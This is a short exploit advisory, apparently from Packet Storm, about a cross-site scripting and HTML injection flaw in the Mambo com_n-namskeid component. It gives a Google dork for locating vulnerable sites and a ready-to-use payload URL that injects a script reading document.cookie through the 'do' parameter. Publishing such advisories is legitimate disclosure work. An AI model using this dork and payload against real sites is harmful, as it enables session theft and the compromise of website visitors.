The Mambo N-Namskeid component suffers from a cross site scripting vulnerability.
9133c81546d774557f09663664675adf9e6781156b0d4632e96ae79b919295b2
------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_n-namskeid XSS & HTML Injection Vulnerability
# Google Dork: inurl:index.php?option=com_n-namskeid
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: http://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------
Exploit
http://localhost/[PATH]/index.php?option=com_n-namskeid&Itemid=1&id=14&do=<script>alert(document.cookie)</script>
------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed